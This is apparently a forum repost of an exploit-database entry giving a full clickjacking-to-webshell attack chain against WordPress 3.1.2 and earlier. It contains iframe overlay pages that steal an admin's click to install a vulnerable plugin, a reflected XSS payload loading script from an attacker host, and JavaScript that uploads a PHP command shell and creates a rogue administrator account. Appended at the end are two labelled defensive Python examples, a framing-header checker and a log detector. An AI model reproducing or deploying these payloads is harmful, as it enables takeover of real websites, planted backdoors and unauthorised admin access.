Wubi Posted July 27, 2012

Wordpress =< 3.1.2 Clickjacking Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode

I'm Caddy-dz member from Inj3ct0r Team

#####
# Exploit Title: Wordpress =< 3.1.2 Clickjacking Exploit 0day
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/Algerian.Cyber.Army
# Home : http://quran4you.eb2a.com
# E-mail: islam_babia@hotmail.com
# Category: webapps
# Google Dork: "powered by wordpress"
# Security Risk: critical
# Tested on: Windows Seven Edition Integral / French
#####
# PS: No protection against clickjacking in WordPress 3.1.2 and earlier

Exploit Process :

1- Lure WordPress admin to a webpage : a clickjacking page with an invisible Plugin Install webpage from their own WordPress admin console on top of a visible dummy page
2- Get them to click : they can't see that they're clicking an "Install Now" button
3- Install Vulnerable Plugin : they have installed SlidePress, a vulnerable plugin
4- Detect Click Happened : using onload="function()"
5- Exploit Vulnerable Plugin : exploit Cross Site Scripting in SlidePress
6- Install Backdoor : upload a shell as a plugin =)

How does Plugin installation work?

- A ZIP archive gets unpacked into http://victim.com/wp-content/plugins/
- Installed but not activated
- The Install Now button is in an iframe pointing to the WordPress admin console
- The Admin user's browser automatically authenticates with session cookies. The Admin must be logged in.

# CJ V1 Exploit :
=================

<html>
<head><title>Clickjack Exploit for WordPress v1</title></head>
<body>
<style>
#outerdiv { width:100px; height:30px; overflow:hidden; position:absolute; top:113px; left:335px; z-index:10; opacity:0; }
#inneriframe { position:absolute; top:-40px; left:-10px; width:200px; height:100px; border: none; }
#para { width:650px; }
</style>
<h1>WordPress Clickjack Exploit v1</h1>
<p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi. <a href="#">read more</a></p>
<div id="outerdiv">
<iframe id="inneriframe" scrolling="no" src="http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-gallery-remote&TB_iframe=true&width=640&height=581">
wordpress
</iframe>
</div>
</body>
</html>

PS: How do I stop redirecting after installing the plugin?

- An iframe within an iframe
- The inner frame which loads the Plugin webpage is named _parent

<iframe id="innerframe" class="innerframe" scrolling="no" src="data:text/html;charset=utf-8,
---snip---
<iframe name='_parent' scrolling='no' src='http://wordpress/wp-admin/plugin-install.php...'></iframe>
"></iframe>

PS: How to leverage the power to install an arbitrary plugin?

* Find a vulnerable plugin
- For example SlidePress is vulnerable to Reflected Cross Site Scripting (XSS)
- Vulnerable when installed but not activated, so only one click is required.

* Proof of concept exploit :

||>> http://wordpress/wp-content/plugins/slidepress/tools/preview.php?sspWidth=1&sspHeight=</script><script>alert(document.cookie)</script>&sspGalleryId=1

- Injects JavaScript into a webpage
- Can add an admin user or upload a backdoor

* How do I automatically start XSS after the Plugin installs?

- I need to detect when the user clicks
- Use the load event of the iframe
- 1st load is the page load, 2nd load is the stolen click

||>>
function frameloaded() {
    load_count = load_count + 1;
    if (load_count == 2) {
        // exploit time
        ex();
    }
}
---snip---
<iframe class='attacksite' onload='frameloaded()'

Upon the 2nd frame load, ex() is called to perform the XSS attack.

- Stage2 is loaded with the SlidePress page which contains a XSS vulnerability
- The XSS payload is stored at http://hax0r/x2.js

||>>
function ex() {
    top.document.getElementById('stage2').src = 'http://wordpress/wp-content/plugins/slidepress/tools/preview.php?sspWidth=1&sspHeight=1%3' + 'C/script%3E' + '%3' + 'Cscript%20src=http://hax0r/x2.js?i=' + Math.random() + '%3E%3' + 'C/script%3E%3' + 'Cnos' + 'cript%3E&sspGalleryId=1&wp_path=/&a=></if' + 'rame>';
}
---snip---
<iframe id="stage2"></iframe>

* exploit source code :
=======================

<style>
#outerdiv { width:100px; height:30px; overflow:hidden; position:absolute; top:135px; left:445px; z-index:10; opacity:0; }
.stage2 { opacity:0; }
#para { width:600px; }
.clickjack { width:100px; height:30px; position:absolute; top:145px; left:450px; }
</style>
<h1>WordPress Clickjack Exploit v1</h1>
<p id="para">Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi.</p>
<div class='clickjack'><a href='#'>read more</a></div>
<div id="outerdiv">
<iframe id="outerframe" scrolling='no' src="data:text/html;charset=utf-8,---snip---"></iframe>
</div>
<iframe class='stage2' style='height:0px;width:0px;' id='stage2'></iframe>

The full outer frame (the snipped part above):

<iframe id="outerframe" scrolling='no' src="data:text/html;charset=utf-8,
<style>
.inneriframe { position:absolute; top:-40px; left:-10px; width:200px; height:100px; border: none; }
</style>
<script>
var load_count = 0;
function frameloaded() {
    load_count = load_count + 1;
    if (load_count == 2) { ex(); }
}
function ex() {
    top.document.getElementById('stage2').src = 'http://wordpress/wp-content/plugins/slidepress/tools/preview.php?sspWidth=1&sspHeight=1%3' + 'C/script%3E' + '%3' + 'Cscript%20src=http://hax0r/x2.js?i=' + Math.random() + '%3E%3' + 'C/script%3E%3' + 'Cnos' + 'cript%3E&sspGalleryId=1&wp_path=/&a=></if' + 'rame>';
}
</script>
<iframe id='inneriframe' class='inneriframe' onload='frameloaded();' name='_parent' scrolling='no' src='http://wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=slidepress&TB_iframe=true&width=640&height=581'></iframe>
"></iframe>

* How do I upload a backdoor with SlidePress's Cross Site Scripting?

* Use JavaScript to force the admin's browser to:
- Use SlidePress XSS to call a payload script on another website: <script src="http://hax0r/x2.js">
- Get the CSRF wpnonce token from the Update page using XMLHttpRequest()
- Upload a Plugin using XMLHttpRequest.sendAsBinary which unpacks a backdoor to http://wordpress/wp-content/plugins/shell/shell.php

[*] Payload to upload PHP Shell :
=================================

// x2.js payload to upload PHP shell to wordpress.
// /wp-content/plugins/shell/shell.php?cmd=ls
path_to_wp = "/";
xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET", path_to_wp + "/wp-admin/plugin-install.php?tab=upload", true);
xmlhttp.onreadystatechange = function() {
    if (xmlhttp.readyState == 4) {
        response = xmlhttp.responseText;
        nonce = response.split('hidden" id="_wpnonce')[1];
        nonce = nonce.split('"')[4];
        xmlhttp.open("POST", path_to_wp + "/wp-admin/update.php?action=upload-plugin", true);
        xmlhttp.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------304661183327760");
        // shell.zip contains shell.php which is <? passthru($_REQUEST['cmd']); ?>
        post_data = "-----------------------------304661183327760\r\n"
            + "Content-Disposition: form-data; name=\"_wpnonce\"\r\n\r\n" + nonce + "\r\n"
            + "-----------------------------304661183327760\r\n"
            + "Content-Disposition: form-data; name=\"_wp_http_referer\"\r\n\r\n" + path_to_wp + "/wp-admin/plugin-install.php?tab=upload\r\n"
            + "-----------------------------304661183327760\r\n"
            + "Content-Disposition: form-data; name=\"pluginzip\";\r\n"
            + "filename=\"shell.zip\"\r\n"
            + "Content-Type: application/octet-stream\r\n\r\n";
        post_data = post_data + "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x3b\x7a\xf6\x3c\x21\xbd\x50\x0a\x22\x00\x00…";
        xmlhttp.setRequestHeader("Content-Length", post_data.length);
        xmlhttp.sendAsBinary(post_data);
    }
}
xmlhttp.send(null);

[*] Payload to add admin :
==========================

// payload to add administrator user
path_to_wp = "/";
new_username = "caddy-dz";
new_password = "caddy-dz";
new_email = "caddy-dz%40hotmail.fr"; // %40 for @
xmlhttp = new XMLHttpRequest();
xmlhttp.open("GET", path_to_wp + "/wp-admin/user-new.php", true);
xmlhttp.onreadystatechange = function() {
    if (xmlhttp.readyState == 4) {
        response = xmlhttp.responseText;
        nonce = response.split('hidden" id="_wpnonce')[1];
        nonce = nonce.split('"')[4];
        xmlhttp.open("POST", path_to_wp + "/wp-admin/user-new.php", true);
        xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        post_data = "_wpnonce=" + nonce + "&action=adduser&user_login=" + new_username + "&first_name=&last_name=&email=" + new_email + "&url=&pass1=" + new_password + "&pass2=" + new_password + "&role=administrator&adduser=Add+User";
        xmlhttp.setRequestHeader("Content-Length", post_data.length);
        xmlhttp.send(post_data);
    }
}
xmlhttp.send(null);

# Peace From Algeria ..//
# Happy Ramadhan ..//
#
# Greets To :
# ==============================================================================
# The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates ,
# TrOoN , jos_ali_joe , All Exploit-Id Team , (exploit-id.com) , (1337day.com) ,
# ... And All Algerian Hax0rs
# ============================================================================================
# 1337day.com [2012-07-27]
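Added defender's example, not part of the original post: a Python check of the framing-protection headers whose absence on wp-admin pages (WordPress 3.1.2 and earlier) the chain above relies on; later WordPress releases send X-Frame-Options: SAMEORIGIN on admin pages via send_frame_options_header(). The header sets are constructed for the example, and the check also covers the CSP frame-ancestors directive, which overrides X-Frame-Options when both are present.

```python
# Framing-protection assessment for an HTTP response. The header sets below are
# constructed for this example, not captured from a real WordPress install.
WP_ADMIN_UNPROTECTED = {"Content-Type": "text/html; charset=UTF-8"}
WP_ADMIN_HARDENED = {"Content-Type": "text/html; charset=UTF-8",
                     "X-Frame-Options": "SAMEORIGIN",
                     "Content-Security-Policy": "frame-ancestors 'self'"}
CSP_OVERRIDES_XFO = {"X-Frame-Options": "SAMEORIGIN",
                     "Content-Security-Policy": "frame-ancestors *"}

def parse_csp(value):
    """Return {directive: [sources]} from a Content-Security-Policy header value."""
    directives = {}
    for part in value.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = [t.strip("'").lower() for t in tokens[1:]]
    return directives

def assess_framing(headers):
    """Return (protected, findings). protected is True only when a current browser
    would refuse to render the page inside a cross-origin iframe."""
    h = {k.lower(): v for k, v in headers.items()}
    findings, protected = [], False
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        protected = True
    elif xfo.startswith("ALLOW-FROM"):
        findings.append("X-Frame-Options ALLOW-FROM is obsolete; current browsers ignore it")
    elif xfo:
        findings.append("X-Frame-Options has an unrecognised value: " + xfo)
    else:
        findings.append("X-Frame-Options missing")
    ancestors = parse_csp(h.get("content-security-policy", "")).get("frame-ancestors")
    if ancestors is None:
        findings.append("CSP frame-ancestors missing")
    elif "*" in ancestors:
        # frame-ancestors takes precedence over X-Frame-Options, so a wildcard
        # re-opens framing even when X-Frame-Options was set correctly
        protected = False
        findings.append("CSP frame-ancestors * allows any origin to frame the page")
    elif ancestors in (["none"], ["self"]):
        protected = True
    else:
        protected = True
        findings.append("frame-ancestors allowlist: " + " ".join(ancestors))
    return protected, findings
```

Run it against the response headers of wp-admin/plugin-install.php as served by the install; an unprotected result means a logged-in admin's click can be stolen exactly as described above.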
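Added detection example, not part of the original post: a Python scan over constructed access-log lines that flags the three server-visible stages of the chain above (the SlidePress preview.php request with script tags in sspHeight/sspWidth, the plugin upload POST to update.php, and a request to a .php file under wp-content/plugins carrying a cmd parameter) and raises severity when the upload follows the XSS probe from the same client, since both are issued by the victim admin's browser. The log lines, timestamps and addresses are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Combined-Log-Format lines mirroring the chain on this page; the
# addresses are documentation ranges and the requests are invented.
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jul/2012:20:14:01 +0100] "GET /wp-admin/plugin-install.php?tab=plugin-information&plugin=slidepress&TB_iframe=true HTTP/1.1" 200 5120',
    '192.0.2.10 - - [27/Jul/2012:20:14:07 +0100] "GET /wp-content/plugins/slidepress/tools/preview.php?sspWidth=1&sspHeight=1%3C/script%3E%3Cscript%20src=http://hax0r/x2.js%3E%3C/script%3E&sspGalleryId=1 HTTP/1.1" 200 812',
    '192.0.2.10 - - [27/Jul/2012:20:14:09 +0100] "POST /wp-admin/update.php?action=upload-plugin HTTP/1.1" 200 3301',
    '198.51.100.7 - - [27/Jul/2012:20:15:30 +0100] "GET /wp-content/plugins/shell/shell.php?cmd=ls HTTP/1.1" 200 240',
    '203.0.113.5 - - [27/Jul/2012:20:16:00 +0100] "GET /wp-content/plugins/slidepress/tools/preview.php?sspWidth=640&sspHeight=480&sspGalleryId=2 HTTP/1.1" 200 812',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
SCRIPT_RE = re.compile(r"</?script", re.I)

def classify(method, target):
    """Map one request to a stage of the chain, or None if it looks benign."""
    url = urlsplit(target)
    path = url.path.lower()
    query = parse_qs(url.query, keep_blank_values=True)   # decodes %3C etc. once
    if path.endswith("/plugins/slidepress/tools/preview.php"):
        for value in query.get("sspHeight", []) + query.get("sspWidth", []):
            if SCRIPT_RE.search(unquote(value)):          # second unquote: double-encoding
                return "slidepress_xss"
    if method == "POST" and path == "/wp-admin/update.php" \
            and query.get("action") == ["upload-plugin"]:
        return "plugin_upload"
    if path.startswith("/wp-content/plugins/") and path.endswith(".php") and "cmd" in query:
        return "plugin_webshell"
    return None

def scan_access_log(lines):
    """Return alerts; an upload preceded by the XSS probe from the same client is high."""
    alerts, stages_by_ip = [], {}
    for number, line in enumerate(lines, 1):
        match = LOG_RE.match(line)
        if not match:
            continue
        ip, _stamp, method, target, status = match.groups()
        stage = classify(method.upper(), target)
        if stage is None:
            continue
        earlier = stages_by_ip.setdefault(ip, [])
        severity = "high" if stage == "plugin_webshell" or \
            (stage == "plugin_upload" and "slidepress_xss" in earlier) else "medium"
        earlier.append(stage)
        alerts.append({"line": number, "ip": ip, "stage": stage,
                       "status": status, "severity": severity})
    return alerts
```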